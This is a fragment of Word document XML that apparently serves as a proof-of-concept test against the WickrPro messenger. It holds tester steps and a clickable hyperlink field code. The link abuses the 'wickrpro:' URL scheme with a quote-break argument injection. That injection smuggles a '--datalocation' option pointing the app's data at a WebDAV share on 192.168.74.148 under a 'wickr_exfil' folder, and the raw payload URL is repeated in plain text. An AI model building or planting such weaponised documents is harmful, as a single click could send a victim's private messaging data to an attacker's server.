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W37b field-code hyperlink test. Step 1: confirm WickrPro is closed. Step 2: click the blue link below. Step 3: capture the WickrPro.exe CommandLine via Get-CimInstance Win32_Process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "wickrpro:x\" --datalocation \\192.168.74.148@80\DavWWWRoot\wickr_exfil\field_test" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Wickr (field-code test)</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Raw target URL (for Alt+F9 inspection):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">wickrpro:x" --datalocation \\192.168.74.148@80\DavWWWRoot\wickr_exfil\field_test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character" w:styleId="Hyperlink">
    <w:rPr>
      <w:color w:val="0000FF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